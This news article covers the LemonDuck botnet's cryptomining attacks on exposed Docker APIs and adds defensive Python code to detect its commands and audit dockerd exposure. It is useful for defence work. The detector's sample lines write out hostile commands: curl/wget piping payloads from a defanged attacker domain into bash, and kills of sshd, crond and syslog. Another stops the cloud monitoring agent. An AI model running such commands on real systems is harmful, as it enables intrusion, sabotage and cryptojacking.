Docker Servers Targeted by LemonDuck Cryptomining Campaign

The authors of the botnet are attacking Linux servers for mining Monero cryptocurrency.


LemonDuck botnet operators have launched a large-scale Monero cryptomining campaign targeting exposed Docker APIs on Linux servers. Cryptomining crews are a persistent threat to Docker hosts that are not properly isolated or configured, and several mass-exploitation campaigns against them have been recorded in recent years.

The cryptomining malware was first identified in 2019 by Trend Micro researchers while it was targeting enterprise networks. The botnet has previously targeted Microsoft Exchange servers, Linux machines via SSH brute-force attacks, Windows systems vulnerable to SMBGhost, and servers running Redis and Hadoop instances.

Methodology Employed 

The LemonDuck botnet gains access through the exposed Docker API and runs a malicious container that fetches a Bash script disguised as a PNG image.

The script is downloaded from the domain t.m7n0y[.]com, which was observed in other LemonDuck attacks. 

“The ‘core.png’ file acts as a pivot by setting a Linux cronjob inside the container. Next, this cronjob downloads another disguised file ‘a.asp,’ which is actually a Bash file,” CrowdStrike researchers explained. “The ‘a.asp’ file is the actual payload in this attack. It takes several steps before downloading and starting a mining operation once it is triggered by a cronjob, as follows.”

The Bash file (a.asp) performs the following actions: 

• Kill processes based on names of known mining pools, competing cryptomining groups, etc. 
• Kill daemons like crond, sshd and syslog. 
• Delete known indicator of compromise (IOC) file paths. 
• Kill network connections to C2s known to belong to competing cryptomining groups. 
• Disable Alibaba Cloud’s monitoring service that protects instances from risky activities. 
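The behaviours listed above are what a defender can look for inside a suspect container or in its crontab. The following detector is an added example written for this page, not code from CrowdStrike or from the LemonDuck report: it scans constructed sample lines (cron entries and script fragments shaped like the chain described above, using the defanged domain from this article) for download-and-execute of a payload with a misleading extension, for kills of crond/sshd/syslog, for kills of competing miners, and for an attempt to stop the cloud monitoring agent. The regexes, the sample lines and the service name `aliyun.service` are assumptions chosen for illustration.

```python
import re
from dataclasses import dataclass

# curl/wget fetching a URL and piping straight into sh/bash
DOWNLOAD_EXEC = re.compile(r"\b(curl|wget)\b[^|;&]*?(https?://\S+)[^|;&]*\|\s*(ba)?sh\b")
# a script served with an image or web-page extension (core.png, a.asp)
EXT_MISMATCH = re.compile(r"\.(png|jpe?g|gif|asp|jsp|php)(\?|$)", re.I)
# killing the daemons the report says the payload kills
DAEMON_KILL = re.compile(r"\b(pkill|killall|kill)\b.*\b(crond|sshd|syslogd?|rsyslogd?)\b")
# killing processes by miner name (XMRig is the miner named in the report)
MINER_KILL = re.compile(
    r"\b(kill|pkill|killall)\b.*\b(xmrig|minerd|monero)\b"
    r"|\b(xmrig|minerd|monero)\b.*\bkill\b"
)
# stopping the cloud monitoring agent; 'aliyun' is an assumed service name
CLOUD_AGENT = re.compile(r"systemctl\s+(stop|disable)\b.*\baliyun\b", re.I)

RULE_DOWNLOAD = "download-and-execute"
RULE_DISGUISED = "download-and-execute (disguised payload)"
RULE_DAEMONS = "kills crond/sshd/syslog"
RULE_MINERS = "kills competing miners"
RULE_CLOUD = "disables cloud monitoring agent"


@dataclass(frozen=True)
class Finding:
    line_no: int
    rule: str
    detail: str


def scan_lines(lines):
    """Return a Finding for every line matching one of the heuristics above."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = DOWNLOAD_EXEC.search(line)
        if m:
            url = m.group(2)
            rule = RULE_DISGUISED if EXT_MISMATCH.search(url) else RULE_DOWNLOAD
            findings.append(Finding(n, rule, url))
        if DAEMON_KILL.search(line):
            findings.append(Finding(n, RULE_DAEMONS, line.strip()))
        if MINER_KILL.search(line):
            findings.append(Finding(n, RULE_MINERS, line.strip()))
        if CLOUD_AGENT.search(line):
            findings.append(Finding(n, RULE_CLOUD, line.strip()))
    return findings


def scan_container_config(config):
    """Flatten Entrypoint/Cmd from a `docker inspect`-style Config dict and scan it."""
    parts = list(config.get("Entrypoint") or []) + list(config.get("Cmd") or [])
    return scan_lines([" ".join(parts)])


# Constructed sample input (not captured from a real host); domain kept defanged.
SAMPLE_LINES = [
    "*/2 * * * * curl -fsSL http://t.m7n0y[.]com/core.png | bash",
    "*/5 * * * * wget -q -O- http://t.m7n0y[.]com/a.asp | sh",
    "0 3 * * * /usr/bin/certbot renew --quiet",
    "pkill -f crond; pkill -f sshd; pkill -f syslog",
    "ps aux | grep -E 'xmrig|minerd' | awk '{print $2}' | xargs kill -9",
    "systemctl stop aliyun.service",
    "apt-get update && apt-get install -y nginx",
]

# Constructed container config in the shape `docker inspect` reports under .Config
SAMPLE_CONTAINER = {
    "Image": "alpine",
    "Cmd": ["sh", "-c", "curl -fsSL http://t.m7n0y[.]com/core.png | bash"],
}

if __name__ == "__main__":
    for f in scan_lines(SAMPLE_LINES) + scan_container_config(SAMPLE_CONTAINER):
        print(f"line {f.line_no}: {f.rule}: {f.detail}")
```

Run it against `crontab -l` output from inside a container, or feed `docker inspect --format '{{json .Config}}'` to `scan_container_config`; lines 1, 2, 4, 5 and 6 of the sample trigger, the certbot and apt-get lines do not.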

In November 2021, cryptomining malware used by unknown attackers was found disabling protective mechanisms in Alibaba Cloud instances. Once the steps above are complete, the Bash script downloads and executes the XMRig miner together with a configuration file that hides the operator's wallets behind proxy pools.

Once the initially infected machine is mining, LemonDuck attempts lateral movement using any SSH keys it finds on the filesystem; where keys are available, it uses them to infect further hosts. The practical defence against this campaign is not to expose the Docker daemon API on cloud instances at all: keep it on the local Unix socket, and if remote access is genuinely required, require TLS client certificates and restrict the port to a management network, since an unauthenticated listener gives anyone who can reach it root-equivalent control of the host.
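One way to check a host for the exposure this campaign abuses, as an added example that is not part of the original article or of any Docker tooling: the function below reads the `hosts`/`tlsverify`/`tlscacert` keys that dockerd accepts in `/etc/docker/daemon.json` (and the equivalent `-H`, `--tlsverify`, `--tlscacert` command-line flags) and reports every TCP listener that would accept unauthenticated clients or is bound on all interfaces. The two configurations are constructed for the example: the weak one is the classic `tcp://0.0.0.0:2375`, the hardened one requires client certificates and binds to an assumed management address.

```python
import json
from urllib.parse import urlparse

# Constructed daemon.json contents (not taken from the report).
WEAK_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"],
})
HARDENED_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://10.0.0.5:2376"],  # assumed mgmt IP
    "tlsverify": True,
    "tlscacert": "/etc/docker/ca.pem",
    "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem",
})

ALL_INTERFACES = {"", "0.0.0.0", "::"}


def _hosts_from_argv(argv):
    """Collect -H / --host values from a dockerd command line."""
    hosts, it = [], iter(argv)
    for tok in it:
        if tok in ("-H", "--host"):
            hosts.append(next(it, ""))
        elif tok.startswith("--host="):
            hosts.append(tok.split("=", 1)[1])
        elif tok.startswith("-H") and len(tok) > 2:
            hosts.append(tok[2:])
    return hosts


def _flag_set(argv, name):
    return any(tok == name or tok.startswith(name + "=") for tok in argv)


def audit_docker_daemon(daemon_json="", argv=()):
    """Return (severity, message) findings for each TCP listener dockerd would open.

    daemon_json is the text of /etc/docker/daemon.json ("" if absent); argv is the
    dockerd command line, because -H on the command line adds listeners as well.
    """
    cfg = json.loads(daemon_json) if daemon_json.strip() else {}
    argv = list(argv)
    hosts = list(cfg.get("hosts", [])) + _hosts_from_argv(argv)
    tls_verify = bool(cfg.get("tlsverify")) or _flag_set(argv, "--tlsverify")
    has_ca = bool(cfg.get("tlscacert")) or _flag_set(argv, "--tlscacert")
    findings = []
    for h in hosts:
        u = urlparse(h)
        if u.scheme != "tcp":
            continue  # unix:// and fd:// listeners are local-only
        if not (tls_verify and has_ca):
            findings.append(("critical", f"{h}: TCP listener without tlsverify and a CA; "
                                         "unauthenticated clients get root-equivalent control"))
        if (u.hostname or "") in ALL_INTERFACES:
            findings.append(("warning", f"{h}: bound on all interfaces; bind to a management "
                                        "address or firewall the port"))
    return findings


if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_DAEMON_JSON), ("hardened", HARDENED_DAEMON_JSON)):
        print(label, audit_docker_daemon(cfg) or "no findings")
```

On a real host, pass the contents of `/etc/docker/daemon.json` and the argv of the running `dockerd` process (from `ps -o args= -C dockerd`); a listener only counts as acceptable when `tlsverify` is on and a CA is configured, and even then the warning reminds you to keep the port off the public interface.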